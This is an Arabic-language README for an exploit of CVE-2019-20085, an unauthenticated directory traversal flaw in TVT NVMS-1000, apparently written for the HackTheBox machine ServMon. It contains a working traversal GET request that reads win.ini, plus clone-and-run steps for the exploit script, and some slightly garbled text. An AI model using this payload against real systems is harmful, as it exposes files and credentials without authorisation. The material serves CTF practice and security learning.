
مستودع يُستخدم لجهاز ServMon على منصة Hackthebox
المؤلف: Z3R0 CVE: CVE-2019-20085 الهدف: TVT NVMS-1000 (جميع الإصدارات المعروفة قبل التصحيح) نوع الثغرة: اجتياز دليل بدون مصادقة التاريخ: [أدخل تاريخ الإصدار الخاص بك]
يحتوي برنامج NVMS-1000 من TVT على ثغرة اجتياز دليل في مكوّن خادم الويب الخاص به. عن طريق إرسال طلب GET مصمم بعناية باستخدام تسلسلات /..، يمكن لمهاجم غير مصادق الوصول إلى أي ملفات على نظام التشغيل الأساسي، بما في ذلك ملفات الإعدادات الحساسة، أو تجزئات كلمات المرور، أو مفاتيح النظام.
يستغل هذا الاستغلال معالجة مسارات الملفات الهشة في خادم HTTP الذي يعمل على NVMS-1000. . يمكن لمهاجم عن بُعد قراءة أي ملف يمكن لمستخدم الخدمة الوصول إليه.
GET /..%5C..%5C..%5C..%5Cwindows%5Cwin.ini HTTP/1.1
Host: <target-ip>:80
C:\Windows\win.ini)requests (pip install requests)git clone https://github.com/Z3R0-0x30/CVE-2019-20085.git
cd CVE-2019-20085
python3 exploit.py http://domain.local/ ../../windows/win.ini win.ini"
تم إصدار هذا الاستغلال لأغراض تعليمية وأبحاث أمنية مصرّح بها فقط. المؤلف Z3R0 غير مسؤول عن أي إساءة استخدام أو وصول غير مصرح به. احصل دائمًا على الإذن المناسب قبل اختبار الأنظمة.